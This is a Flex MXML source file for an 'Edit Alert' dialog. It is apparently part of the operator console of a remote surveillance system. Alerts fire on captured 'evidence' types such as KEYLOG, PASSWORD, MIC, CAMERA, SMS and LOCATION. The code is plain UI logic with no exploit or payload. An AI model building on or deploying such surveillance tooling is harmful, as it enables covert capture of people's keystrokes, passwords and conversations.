<?xml version="1.0" encoding="utf-8"?>
<utils:TitleWindowSaveClose xmlns:fx="http://ns.adobe.com/mxml/2009" 
                             xmlns:s="library://ns.adobe.com/flex/spark" 
                             xmlns:mx="library://ns.adobe.com/flex/mx" 
                             xmlns:utils="it.ht.rcs.console.utils.*" width="400" height="340"
                             skinClass="it.ht.rcs.console.skins.TitleWindowSaveCloseSkin"
                             save="saveMe()"
                             title="{resourceManager.getString('localized_main', 'EDIT_ALERT').toUpperCase()}" 
                             xmlns:view="it.ht.rcs.console.alerting.view.*" 
                             xmlns:search="it.ht.rcs.console.operations.search.*">

  <fx:Script>
    <![CDATA[
      import it.ht.rcs.console.alert.model.Alert;
      
      import mx.collections.ArrayCollection;
      import mx.managers.PopUpManager;
      
      [Bindable]
      private var _alert:Alert;

      [Bindable]
      private var types:ArrayCollection = new ArrayCollection(['LOG', 'MAIL']);
      [Bindable]
      private var actions:ArrayCollection = new ArrayCollection(['EVIDENCE', 'SYNC', 'INSTANCE']);
      [Bindable]
      private var evidence:ArrayCollection = new ArrayCollection(['*', 'ADDRESSBOOK', 'APPLICATION', 'CALENDAR', 'CALL', 'CAMERA', 'CHAT', 'CLIPBOARD', 'DEVICE', 
                                                                  'DOWNLOAD', 'FILECAP', 'FILEOPEN', 'FILESYSTEM', 'INFO', 'KEYLOG', 'LOCATION', 'MAIL', 'MIC', 
                                                                  'MMS', 'MOUSE', 'PASSWORD', 'PRINT', 'SMS', 'SNAPSHOT', 'UPLOAD', 'URL']);
      
      public function set alert(a:Alert):void
      {
        _alert = a;
      }
      
      private function saveMe():void
      {
        _alert.enabled = formEnabled.selected;
        _alert.type = formType.selectedItem;

        //_alert.path = formPath.selectedItem.path;
        
        _alert.action = formAction.selectedItem;
        if (_alert.action == 'EVIDENCE') {
          _alert.evidence = formEvidence.selectedItem;
          _alert.keywords = formKeyword.text;
          _alert.tag = formTag.value;
        } else {
          _alert.evidence = '';
          _alert.keywords = '';          
          _alert.tag = 0;
        }
        _alert.suppression = parseInt(formSuppression.text);
        
        PopUpManager.removePopUp(this);
      }
      
    ]]>
  </fx:Script>
  
  <fx:Metadata>
    [ResourceBundle("localized_main")] 
  </fx:Metadata>
  
  <s:Form left="5" right="5" top="5" bottom="5" skinClass="it.ht.rcs.console.skins.CompactForm" >
    <s:FormItem label="{resourceManager.getString('localized_main', 'ENABLED')}" skinClass="it.ht.rcs.console.skins.CompactFormItem">
      <s:CheckBox id="formEnabled" selected="{_alert.enabled}"/>
    </s:FormItem>
    <s:FormItem label="{resourceManager.getString('localized_main', 'ALERT_EVENT')}" skinClass="it.ht.rcs.console.skins.CompactFormItem">
      <s:DropDownList id="formAction" width="100" dataProvider="{actions}" selectedIndex="{actions.toArray().indexOf(_alert.action)}"/>
    </s:FormItem>

    <s:FormItem label="{resourceManager.getString('localized_main', 'PATH')}" skinClass="it.ht.rcs.console.skins.CompactFormItem">
      <search:ItemSearch width="200"/>
    </s:FormItem>
    
    <s:FormItem label="Evidence" skinClass="it.ht.rcs.console.skins.CompactFormItem" enabled="{formAction.selectedItem == 'EVIDENCE'}">
      <s:DropDownList id="formEvidence" width="120" dataProvider="{evidence}" selectedIndex="{evidence.toArray().indexOf(_alert.evidence)}"/>
    </s:FormItem>
    <s:FormItem label="{resourceManager.getString('localized_main', 'KEYWORD')}" skinClass="it.ht.rcs.console.skins.CompactFormItem" enabled="{formAction.selectedItem == 'EVIDENCE'}">
      <s:TextInput id="formKeyword" text="{_alert.keywords}" width="200"/>
    </s:FormItem>
    <s:FormItem label="{resourceManager.getString('localized_main', 'TAG')}" skinClass="it.ht.rcs.console.skins.CompactFormItem" enabled="{formAction.selectedItem == 'EVIDENCE'}">
      <s:HGroup verticalAlign="middle">
        <s:HSlider id="formTag" minimum="0" maximum="4" width="30" value="{_alert.tag}"/>
        <view:TagImage value="{formTag.value}"/>        
      </s:HGroup>
    </s:FormItem>
    
    <s:FormItem label="{resourceManager.getString('localized_main', 'TYPE')}" skinClass="it.ht.rcs.console.skins.CompactFormItem">
      <s:DropDownList id="formType" width="70" dataProvider="{types}" selectedIndex="{types.toArray().indexOf(_alert.type)}"/>
    </s:FormItem>
    <s:FormItem label="{resourceManager.getString('localized_main', 'SUPPRESSION_TIME')}" skinClass="it.ht.rcs.console.skins.CompactFormItem">
      <s:HGroup verticalAlign="middle">
        <s:TextInput id="formSuppression" width="40" text="{_alert.suppression}" textAlign="right"/>
        <s:Label text="sec"/>
      </s:HGroup>
    </s:FormItem>
  </s:Form>
</utils:TitleWindowSaveClose>
